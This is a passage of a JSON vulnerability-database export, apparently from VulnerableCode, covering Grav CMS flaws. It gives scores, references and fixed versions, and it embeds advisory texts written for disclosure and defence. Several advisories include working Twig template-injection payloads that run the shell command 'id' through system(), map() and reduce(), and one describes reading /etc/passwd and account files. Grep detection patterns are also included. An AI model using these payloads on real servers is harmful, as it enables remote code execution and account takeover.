http://public2.vulnerablecode.io/api/packages/33336?format=json","purl":"pkg:composer/getgrav/grav@1.7.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"}],"aliases":["CVE-2024-28118","GHSA-r6vw-8v8r-pmp4"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hdsp-4e4r-c3fh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29957?format=json","vulnerability_id":"VCID-hwcx-1fp9-3bhh","summary":"Grav may be vulnerable to SSRF attack via Twig Templates\nIn grav <1.7.49.5, a SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66844","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17804","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66844"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/Yohane-Mashiro/grav_cve/issues/2","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-16T15:32:54Z/"}],"url":"https://github.com/Yohane-Mashiro/grav_cve/issues/2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66844","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66844"},{"reference_url":"https://github.com/advisories/GHSA-729w-j79f-2c34","reference_id":"GHSA-729w-j79f-2c34","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-729w-j79f-2c34"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/872248?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.1"}],"aliases":["CVE-2025-66844","GHSA-729w-j79f-2c34"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hwcx-1fp9-3bhh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30376?format=json","vulnerability_id":"VCID-ng3h-ees8-vubs","summary":"Grav is vulnerable to Arbitrary File Read\n### Summary\n\n- A low privilege user account with page editing privilege can read any server files using \"Frontmatter\" form.\n- This includes Grav user account files - /grav/user/accounts/*.yaml. This file stores hashed user password, 2FA secret, and the password reset token.\n- This can allow an adversary to compromise any registered account by resetting a password for a user to get access to the password reset token from the file or by cracking the hashed password.\n\n### Details\n_The vulnerability can be found in /user/plugins/form/templates/forms/fields/display/display.html.twig_\n\n\n\n### PoC\n1.\tThis PoC was conducted on Grav CMS version 1.7.46 and Admin Plugin version 1.10.46\n \n\n\n2.\tgo to “http://grav.local/admin/pages” then create new page with “Page Template” option set to “Form”.\n \n\n\n3.\tThen go to “Expert” and on Frontmatter input box used to following form template.\n\n\n\n4.\tSave page and go the preview or published page you will see the content of “/etc/passwd” file on the server.\n \n\n\n\n\n### Impact\nThis can allow a low privileged user to perform a full account takeover of other registered users including Administrators. This can also allow an adversary to read any file on the web server. And Due to insufficient permission verification , user who can write a page also can use frontmatter feature using this IDOR vulnerability [PoC IDOR](https://www.youtube.com/watch?v=EU1QA0idoWE&ab_channel=%EA%B9%80%EC%A2%85%EB%AF%BC) mention in [CVE-2024-2792](https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66300","reference_id":"","reference_type":"","scores":[{"value":"0.00073","scoring_system":"epss","scoring_elements":"0.22328","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66300"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:08:33Z/"}],"url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-p4ww-mcp9-j6f2","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:08:33Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-p4ww-mcp9-j6f2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66300","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66300"},{"reference_url":"https://github.com/advisories/GHSA-p4ww-mcp9-j6f2","reference_id":"GHSA-p4ww-mcp9-j6f2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p4ww-mcp9-j6f2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66300","GHSA-p4ww-mcp9-j6f2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ng3h-ees8-vubs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11478?format=json","vulnerability_id":"VCID-p24p-fcpe-xbah","summary":"Server-Side Template Injection (SSTI) with Grav CMS security sandbox bypass\n### Summary\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox.\n\n### Details\nThe Grav CMS implements a custom sandbox to protect the powerful Twig methods \"registerUndefinedFunctionCallback()\" and \"registerUndefinedFilterCallback()\", in order to avoid SSTI attacks by denying the calling of dangerous PHP functions into the Twig template directives (such as: \"exec()\", \"passthru()\", \"system()\", etc.). \nThe current defenses are based on a blacklist of prohibited functions (PHP, Twig), checked through the \"isDangerousFunction()\" method called in the file \"system/src/Grav/Common/Twig.php\":\n\n```php\n...\n$this->twig = new TwigEnvironment($loader_chain, $params);\n\n$this->twig->registerUndefinedFunctionCallback(function (string $name) use ($config) {\n $allowed = $config->get('system.twig.safe_functions');\n if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {\n return new TwigFunction($name, $name);\n }\n if ($config->get('system.twig.undefined_functions')) {\n if (function_exists($name)) {\n if (!Utils::isDangerousFunction($name)) {\n user_error(\"PHP function {$name}() was used as Twig function. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_functions`\", E_USER_DEPRECATED);\n\n return new TwigFunction($name, $name);\n }\n\n /** @var Debugger $debugger */\n $debugger = $this->grav['debugger'];\n $debugger->addException(new RuntimeException(\"Blocked potentially dangerous PHP function {$name}() being used as Twig function. If you really want to use it, please add it to system configuration: `system.twig.safe_functions`\"));\n }\n\n return new TwigFunction($name, static function () {});\n }\n\n return false;\n});\n\n$this->twig->registerUndefinedFilterCallback(function (string $name) use ($config) {\n $allowed = $config->get('system.twig.safe_filters');\n if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {\n return new TwigFilter($name, $name);\n }\n if ($config->get('system.twig.undefined_filters')) {\n if (function_exists($name)) {\n if (!Utils::isDangerousFunction($name)) {\n user_error(\"PHP function {$name}() used as Twig filter. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_filters`\", E_USER_DEPRECATED);\n return new TwigFilter($name, $name);\n }\n...\n```\nIn the code above it can be seen that the calls of the \"isDangerousFunction()\" are not performed when the method/filter in the \"$name\" variable has been considered safe. A function can be defined safe only by an administrator user, by adding it into the configuration properties \"system.twig.safe_functions\" and/or \"system.twig.safe_filters\" (a sort of whitelists that by default are empty) of the configuration file \"system/config/system.yaml\".\n\nIt is to note that within the \"system/src/Grav/Common/Twig.php\" file a Twig class is defined (with its constructor, methods and attributes) and in particular the Twig object (and environment) is instantiated on it:\n```php\n/**\n * Class Twig\n * @package Grav\\Common\\Twig\n */\nclass Twig\n{\n /** @var Environment */\n public $twig;\n /** @var array */\n public $twig_vars = [];\n /** @var array */\n public $twig_paths;\n /** @var string */\n public $template;\n...\n /**\n * Constructor\n *\n * @param Grav $grav\n */\n public function __construct(Grav $grav)\n {\n $this->grav = $grav;\n $this->twig_paths = [];\n }\n\n /**\n * Twig initialization that sets the twig loader chain, then the environment, then extensions\n * and also the base set of twig vars\n *\n * @return $this\n */\n public function init()\n {\n if (null === $this->twig) {\n /** @var Config $config */\n $config = $this->grav['config'];\n...\n```\nSince the security sandbox does not protect the Twig object it is possible to interact with it (e.g. call its methods, read/write its attributes) through opportunely crafted Twig template directives injected on a web page. \nThen an authenticated editor user could be able to add arbitrary functions into the Twig attributes \"system.twig.safe_functions\" and \"system.twig.safe_filters\" in order to circumvent the Grav CMS sandbox.\n\n\n### PoC\nAn authenticated user with the permissions to edit a page (having Twig processing enabled) on the Grav CMS admin console, could create/edit a web page containing a malicious template directive to execute arbitrary OS commands on the remote web server.\nFor instance, in order to abuse the vulnerability and execute the prohibited \"system('id')\" code, bypassing the sandbox, the editor could generate a web page containing the following template directives:\n```\n{% set arr = {'1':'system', '2':'foo'} %}\n{{ var_dump(grav.twig.twig_vars['config'].set('system.twig.safe_functions', arr)) }}\n{{ system('id') }}\n```\nOnce saved the malicious page could be accessed by unauthenticated users to execute the \"system('id')\" code on the remote server hosting the vulnerable Grav CMS.\n\n\n### Impact\nIt is possible to execute remote code on the underlying server and compromise it.\n\n\n### Tested version\nGrav CMS v1.7.43\n\n\n### Reported by\nMaurizio Siddu","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28116","reference_id":"","reference_type":"","scores":[{"value":"0.62168","scoring_system":"epss","scoring_elements":"0.98376","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28116"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-01T20:55:43Z/"}],"url":"https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-01T20:55:43Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28116","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28116"},{"reference_url":"https://github.com/advisories/GHSA-c9gp-64c4-2rrh","reference_id":"GHSA-c9gp-64c4-2rrh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c9gp-64c4-2rrh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33336?format=json","purl":"pkg:composer/getgrav/grav@1.7.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"}],"aliases":["CVE-2024-28116","GHSA-c9gp-64c4-2rrh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p24p-fcpe-xbah"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38762?format=json","vulnerability_id":"VCID-ppnh-1zmd-t3c5","summary":"Hi,\n\nactually we have sent the bug report to [security@getgrav.org](mailto:security@getgrav.org) on 27th March 2023 and on 10th April 2023.\n\n# Grav Server-side Template Injection (SSTI) via Twig Default Filters\n\n## Summary: \n| **Product** | Grav CMS |\n| ----------------------- | --------------------------------------------- |\n| **Vendor** | Grav |\n| **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution |\n| **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) |\n| **Tested Versions** | v1.7.40 |\n| **Internal Identifier** | STAR-2023-0008 |\n| **CVE Identifier** | TBD |\n| **CWE(s)** | CWE-184: Incomplete List of Disallowed Inputs, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine |\n\n## CVSS3.1 Scoring System: \n**Base Score:** 7.2 (High) \n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` \n| **Metric** | **Value** |\n| ---------------------------- | --------- |\n| **Attack Vector (AV)** | Network |\n| **Attack Complexity (AC)** | Low |\n| **Privileges Required (PR)** | High |\n| **User Interaction (UI)** | None |\n| **Scope (S)** | Unchanged |\n| **Confidentiality \\(C)** | High |\n| **Integrity (I)** | High |\n| **Availability (A)** | High |\n\n## Product Overview: \nGrav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.\n\n## Vulnerability Summary: \nThe patch for [CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/), a server-side template injection vulnerability in Grav leveraging the default `filter()` function, did not block other built-in functions exposed by Twig's Core Extension that could be used to invoke arbitrary unsafe functions, thereby allowing for remote code execution.\n\n## Vulnerability Details: \nTwig comes with an extension known as the [Core Extension](https://github.com/twigphp/Twig/blob/v1.44.7/src/Extension/CoreExtension.php) that is enabled by default when initialising a new [Twig environment](https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148). Twig's Core Extension provides multiple built-in filters, such as the `filter()` function, which can be used in Twig templates. \n\n[CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/) leverages the default `filter()` filter function in Twig to invoke arbitrary unsafe functions. This was patched by overriding the default `filter()` filter function in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) of Grav v1.7.34 to perform validation checks on the arguments passed to `filter()`:\n~~~diff php\n...\nclass GravExtension extends AbstractExtension implements GlobalsInterface\n{\n ...\n public function getFilters(): array\n {\n return [\n ...\n // Security fix\n+ new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]),\n ];\n }\n \n ...\n\n+ /**\n+ * @param Environment $env\n+ * @param array $array\n+ * @param callable|string $arrow\n+ * @return array|CallbackFilterIterator\n+ * @throws RuntimeError\n+ */\n+ function filterFilter(Environment $env, $array, $arrow)\n+ {\n+ if (is_string($arrow) && Utils::isDangerousFunction($arrow)) {\n+ throw new RuntimeError('Twig |filter(\"' . $arrow . '\") is not allowed.');\n+ }\n+\n+ return \\twig_array_filter($env, $array, $arrow);\n+ }\n}\n~~~\n\nHowever, looking at the source code of [/src/Extension/CoreExtension.php](https://github.com/twigphp/Twig/blob/v1.44.7/src/Extension/CoreExtension.php) of Twig, alternative default Twig filters could also be used invoke arbitrary functions:\n~~~php\n...\nclass CoreExtension extends AbstractExtension\n{\n ...\n public function getFilters(): array\n {\n return [\n ...\n // array helpers\n ...\n new TwigFilter('filter', 'twig_array_filter', ['needs_environment' => true]), // unsafe\n new TwigFilter('map', 'twig_array_map', ['needs_environment' => true]), // unsafe\n new TwigFilter('reduce', 'twig_array_reduce', ['needs_environment' => true]), // unsafe\n ];\n }\n~~~\n\nThe three filter functions above respectively call `array_filter()`, `array_map()` and `array_reduce()`. Since only `filter()` is being overriden by Grav to ensure that the callable passed to `filter()` does not result in the invocation of an unsafe function, the other two functions (i.e. `map()` and `reduce()`) could be used by an authenticated attacker that is able to inject and render malicious templates to gain remote code execution.\n\n## Exploit Conditions: \nThis vulnerability can be exploited if the attacker has access to:\n1. an administrator account, or\n2. a non-administrator, user account that are granted the following permissions:\n - login access to Grav admin panel, and\n - page creation or update rights\n\n## Reproduction Steps: \n1. Log in to Grav Admin using an administrator account.\n2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user:\n * Login to Admin - Allowed\n * Page Update - Allowed\n2. Log out of Grav Admin, and log back in using the account created in step 2.\n3. Navigate to `http://<grav_installation>/admin/pages/home`.\n4. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.\n5. Under the `Content` tab, insert the following payload within the editor:\n ~~~twig\n {{ ['id'] | map('system') }}\n {{ ['id'] | reduce('system') }}\n ~~~\n4. Click the Preview button. Observe that the output of the `id` shell command is returned in the preview.\n\n## Suggested Mitigations: \nOverride the built-in Twig `map()` and `reduce()` filter functions in `system/src/Grav/Common/Twig/Extension/GravExtension.php` to validate the argument passed to the filter in `$arrow`.\n\nFor example:\n~~~diff\n...\nclass GravExtension extends AbstractExtension implements GlobalsInterface\n{\n ...\n public function getFilters(): array\n {\n return [\n ...\n // Security fix\n new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]),\n+ new TwigFilter('map', [$this, 'mapFilter'], ['needs_environment' => true]),\n+ new TwigFilter('reduce', [$this, 'reduceFilter'], ['needs_environment' => true]),\n ];\n }\n\n ...\n+ /**\n+ * @param Environment $env\n+ * @param array $array\n+ * @param callable|string $arrow\n+ * @return array|CallbackFilterIterator\n+ * @throws RuntimeError\n+ */\n+ function mapFilter(Environment $env, $array, $arrow)\n+ {\n+ if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) {\n+ throw new RuntimeError('Twig |map(\"' . $arrow . '\") is not allowed.');\n+ }\n+\n+ return \\twig_array_map($env, $array, $arrow);\n+ }\n+ \n+ /**\n+ * @param Environment $env\n+ * @param array $array\n+ * @param callable|string $arrow\n+ * @return array|CallbackFilterIterator\n+ * @throws RuntimeError\n+ */\n+ function reduceFilter(Environment $env, $array, $arrow)\n+ {\n+ if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) {\n+ throw new RuntimeError('Twig |reduce(\"' . $arrow . '\") is not allowed.');\n+ }\n+\n+ return \\twig_array_reduce($env, $array, $arrow);\n+ }\n}\n~~~\n\n## Detection Guidance: \nThe following strategies may be used to detect potential exploitation attempts.\n1. Searching within Markdown pages using the following shell command: \n `grep -Priz -e '\\|\\s*(map|reduce)\\s*\\(' /path/to/webroot/user/pages/`\n2. Searching within Doctrine cache data using the following shell command: \n `grep -Priz -e '\\|\\s*(map|reduce)\\s*\\(' --include '*.doctrinecache.data' /path/to/webroot/cache/`\n3. Searching within Twig cache using the following shell command: \n `grep -Priz -e 'twig_array_(map|reduce)' /path/to/webroot/cache/twig/`\n4. Searching within compiled Twig template files using the following shell command: \n `grep -Priz -e '\\|\\s*(map|reduce)\\s*\\(' /path/to/webroot/cache/compiled/files/`\n\nNote that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.\n\n## Credits: \nNgo Wei Lin ([@Creastery](https://twitter.com/Creastery)) & Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg))\n\n## Vulnerability Disclosure: \nThis vulnerability report is subject to a 120 day disclosure deadline as per [STAR Labs SG Pte. Ltd.'s Vulnerability Disclosure Policy](https://starlabs.sg/advisories/STAR%20Labs%20SG%20Pte.%20Ltd.%20Vulnerability%20Disclosure%20Policy.pdf). After 120 days have elapsed, the vulnerability report will be published to the public by [STAR Labs SG Pte. Ltd.](https://starlabs.sg/) (STAR Labs). \n\nThe scheduled disclosure date is _**25th July, 2023**_. Disclosure at an earlier date is also possible if agreed upon by all parties. \n\nKindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report: \n1. **CVE-2023-30596**\n Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `GravExtension.filterFilter()` and to achieve remote code execution via Twig's default filters `map()` and `reduce()`. This is a bypass of CVE-2022-2073.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34448","reference_id":"","reference_type":"","scores":[{"value":"0.08847","scoring_system":"epss","scoring_elements":"0.92666","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34448"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"},{"reference_url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"},{"reference_url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/